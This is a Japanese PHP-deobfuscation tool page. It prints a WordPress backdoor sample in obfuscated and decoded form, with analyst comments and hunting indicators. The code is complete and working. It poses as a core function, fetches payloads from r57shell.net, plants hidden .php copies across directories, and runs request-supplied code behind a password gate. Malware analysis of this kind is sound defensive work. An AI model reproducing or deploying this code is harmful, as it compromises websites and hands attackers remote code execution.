
PHP 難読化コードの復元・デコード

WordPress 等の PHP マルウェア・ウィルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto QHTmE; ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto TmK7C; B8IHf: $uri_path = $parse_url["path"]; goto DR8d0; TmK7C: $request_uri = ...



難読化されたPHPコード

<?php 
 // Malware sample in its obfuscated form. The only obfuscation is control-flow
 // shuffling: statements are split into labelled fragments chained by goto, so the
 // execution order follows the labels (the function starts with "goto QHTmE"),
 // not the order of the text.
 // String literals are left in clear text, so the remote host name, the "sess_"
 // prefix, "gagal.php" and the "slince_golden" parameter can be matched directly
 // by a content scan of PHP files.
 if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto QHTmE; ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto TmK7C; B8IHf: $uri_path = $parse_url["path"]; goto DR8d0; TmK7C: $request_uri = $_SERVER["REQUEST_URI"]; goto Lhccs; Sae33: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto EmUwt; yxZ6i: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto TMxaR; O4NxR: if (!file_exists($tmp_file)) { goto Jjyr3; qVUcF: @touch($tmp_file); goto FrbfO; FrbfO: @file_put_contents($tmp_file, $response); goto fUkP_; Jjyr3: if (function_exists("curl_init")) { goto EZy_9; EZy_9: $ch = curl_init(); goto VR0Vi; OFlqh: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VdcLO; VR0Vi: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto OFlqh; DcJlW: $response = curl_exec($ch); goto fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto DcJlW; fkRwe: curl_close($ch); goto MpMm6; MpMm6: } else { goto Rsl9q; PQRsR: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto NXRla; DmscO: $context = stream_context_create($opts); goto PQRsR; Rsl9q: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vGpwe; vGpwe: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto DmscO; NXRla: } goto qVUcF; fUkP_: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto Mh1sz; Mh1sz: if (function_exists("curl_init")) { goto DVDkP; u_SFh: $response = curl_exec($ch); goto zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto AvWVd; YWAQw: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto u_SFh; DVDkP: $ch = curl_init(); goto zMTgu; zDHcZ: curl_close($ch); goto v98go; AvWVd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto YWAQw; v98go: } else { goto JGb71; Npbn0: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto dtUcU; JGb71: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto Npbn0; hCspz: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto XWjW4; dtUcU: $context = stream_context_create($opts); goto hCspz; XWjW4: } goto zkCQa; zkCQa: @touch($tmp_file); goto RL2uX; RL2uX: @file_put_contents($tmp_file, $response); goto Fx07H; Fx07H: } } goto BXZRC; EmUwt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto jUXuO; DR8d0: $uri_path = dirname($uri_path); goto ReBbR; QCYq2: foreach ($dirs as $d) { goto DpqP9; eMOLH: @file_put_contents($file_name, $response); goto xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto eMOLH; KHsZ5: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . 
".php"; @file_put_contents($file_name, $response); } } goto vTd8M; vTd8M: } goto VCwm6; jUXuO: if (@$_GET["slince_golden"]) { goto qhIqa; v6_uU: if (md5(sha1(@$_GET["is"])) == $response) { goto LNCgX; LNCgX: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto mNwUE; mNwUE: if (@$_GET["m"]) { goto u3lO9; u3lO9: if (function_exists("curl_init")) { goto h0059; nzFPK: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto SlTBv; SMEF2: curl_close($ch); goto nxTNz; h0059: $ch = curl_init(); goto nzFPK; SlTBv: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto cerjF; cerjF: $response = curl_exec($ch); goto SMEF2; nxTNz: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto VIyGz; oeY1g: echo $file_name_path; goto UXu2c; VIyGz: $file_name_path = @$_GET["m"] . "gagal.php"; goto xhRaG; xhRaG: @file_put_contents($file_name_path, $response); goto oeY1g; UXu2c: } goto jKG5A; jKG5A: if (@$_POST["l"]) { function basic_code_extensions($request) { goto JTclu; tgcIK: $tmpf = $tmpf["uri"]; goto z3rep; vnQ75: $ret = (include $tmpf); goto Cvaad; JTclu: $tmp = tmpfile(); goto ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp); goto tgcIK; z3rep: fwrite($tmp, $request); goto vnQ75; aY2Ix: return $ret; goto hdvh2; Cvaad: fclose($tmp); goto aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["l"])); } goto ZFcwP; ZFcwP: } goto OlWFN; OlWFN: exit; goto vQOuT; qhIqa: echo "<!-- //Silence is golden. 
-->"; goto q9t4S; q9t4S: if (function_exists("curl_init")) { goto P3bql; sk_2w: curl_close($ch); goto j1BU_; P3bql: $ch = curl_init(); goto FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto XAilZ; AJz_6: $response = curl_exec($ch); goto sk_2w; XAilZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto AJz_6; j1BU_: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto v6_uU; vQOuT: } goto O4NxR; TMxaR: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto Sae33; BXZRC: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto QCYq2; Lhccs: $parse_url = parse_url($request_uri); goto B8IHf; VCwm6: } wp_core_version_check(); } ?>

デコード(難読化解除)されたコード

<?php

// Malware sample (decoded): a PHP backdoor and dropper that poses as a WordPress
// core routine. Nothing in the body checks a version; the name is cover only.
// The function_exists() guard means the function is defined and run once per
// request even when this snippet is present in several included files.
//
// Indicators visible in this listing (for hunting on a suspect host):
//   - outbound plain-HTTP requests from PHP to r57shell[.]net
//     (/jquery.php?v=1.2&... and /mini_admin.txt)
//   - a file "sess_" + 32 hex characters in sys_get_temp_dir() or next to the script
//   - hidden files named ".<directory name>.php" in first- and second-level
//     directories under the derived site root
//   - files whose names end in "gagal.php"
//   - requests carrying the query parameter "slince_golden"
// The dropped file contents come from the remote host and are not shown here,
// so removing this snippet alone does not clean a site.
if (!function_exists("wp_core_version_check")) {
    /**
     * Runs on every request that loads the infected file. It has two modes:
     *
     * 1. Operator mode (query parameter "slince_golden" is set): checks a
     *    caller-supplied value against a hash fetched from the remote host and,
     *    on a match, runs caller-supplied code or drops a further file; then exits.
     * 2. Persistence mode (all other requests): fetches a payload from the remote
     *    host, caches it in a "sess_" file, and writes copies of it as hidden
     *    .php files into the site's subdirectories.
     *
     * Takes no parameters and returns nothing; all input comes from $_SERVER,
     * $_GET and $_POST, and all effects are file writes, output and HTTP requests.
     */
    function wp_core_version_check()
    {
        // Derive the site root: strip the URI's directory part from the directory
        // of the running script.
        $document_file = $_SERVER["SCRIPT_FILENAME"];
        $request_uri = $_SERVER["REQUEST_URI"];
        $parse_url = parse_url($request_uri);
        $uri_path = $parse_url["path"];
        $uri_path = dirname($uri_path);
        $file_path = dirname($document_file);
        $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
        if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') {
            $document_root = $file_path;
        } else {
            $document_root = str_replace($uri_path, '', $file_path);
        }
        $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]);
        // Cache file path. The "sess_" prefix resembles PHP's session file naming,
        // so the file blends in with real session files in the temp directory.
        // Falls back to the script's own directory when the temp dir is not writable.
        if (is_writable(sys_get_temp_dir())) {
            $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
        } else {
            $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
        }
        // --- Operator mode -------------------------------------------------------
        if (@$_GET["slince_golden"]) {
            // Emits the comment WordPress ships in its placeholder index.php files.
            echo "<!-- //Silence is golden. -->";
            // The expected credential hash is not stored locally; it is fetched
            // from the remote host on each such request.
            if (function_exists("curl_init")) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get");
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                $response = curl_exec($ch);
                curl_close($ch);
            } else {
                $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get");
            }
            // Gate: md5(sha1()) of the "is" parameter must equal the fetched value.
            if (md5(sha1(@$_GET["is"])) == $response) {
                // Calls the function named by "f" with "c" as its argument and
                // prints the result: arbitrary function invocation by the caller.
                if (@$_GET["f"]) {
                    print_r($_GET["f"]($_GET["c"]));
                }
                // Downloads mini_admin.txt from the remote host and writes it to a
                // caller-chosen path prefix + "gagal.php", then prints that path.
                if (@$_GET["m"]) {
                    if (function_exists("curl_init")) {
                        $ch = curl_init();
                        curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt");
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        $response = curl_exec($ch);
                        curl_close($ch);
                    } else {
                        $response = file_get_contents("http://r57shell.net/mini_admin.txt");
                    }
                    $file_name_path = @$_GET["m"] . "gagal.php";
                    @file_put_contents($file_name_path, $response);
                    echo $file_name_path;
                }
                // Writes the POST field "l" to a temporary file and include()s it,
                // i.e. executes request-supplied PHP without using eval().
                if (@$_POST["l"]) {
                    function basic_code_extensions($request)
                    {
                        $tmp = tmpfile();
                        $tmpf = stream_get_meta_data($tmp);
                        $tmpf = $tmpf["uri"];
                        fwrite($tmp, $request);
                        $ret = (include $tmpf);
                        fclose($tmp);
                        return $ret;
                    }
                    print_r(basic_code_extensions($_POST["l"]));
                }
            }
            // Stops here whether or not the gate passed, so the legitimate page is
            // never rendered for these requests.
            exit;
        }
        // --- Persistence mode ----------------------------------------------------
        // No cache file yet: fetch the payload. The Referer header carries this
        // site's host and request URI, which discloses the infected URL to the
        // remote host.
        if (!file_exists($tmp_file)) {
            if (function_exists("curl_init")) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
                $response = curl_exec($ch);
                curl_close($ch);
            } else {
                $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
                $opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
                $context = stream_context_create($opts);
                $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
            }
            @touch($tmp_file);
            @file_put_contents($tmp_file, $response);
        } else {
            // Cache file exists: reuse it unless it lacks the string "stt1", in
            // which case the payload is fetched again and the cache overwritten.
            // NOTE(review): "stt1" looks like a marker the remote payload is
            // expected to contain; the payload itself is not on this page.
            $response = file_get_contents($tmp_file);
            if (!@preg_match("#stt1#", $response)) {
                if (function_exists("curl_init")) {
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
                    $response = curl_exec($ch);
                    curl_close($ch);
                } else {
                    $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
                    $opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
                    $context = stream_context_create($opts);
                    $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
                }
                @touch($tmp_file);
                @file_put_contents($tmp_file, $response);
            }
        }
        // Spread: write the payload as ".<dirname>.php" into every directory
        // directly under the derived root. The leading dot hides the file from a
        // default directory listing; errors are suppressed with @.
        $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
        foreach ($dirs as $d) {
            $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
            @file_put_contents($file_name, $response);
            // Same again one level down, skipping paths that contain "wp-content".
            // The first-level write above has no such exclusion.
            $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
            foreach ($dirs as $d) {
                if (!@preg_match("#wp-content#", $d)) {
                    $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
                    @file_put_contents($file_name, $response);
                }
            }
        }
    }
    // Invoked immediately, so the routine runs whenever the infected file is loaded.
    wp_core_version_check();
}

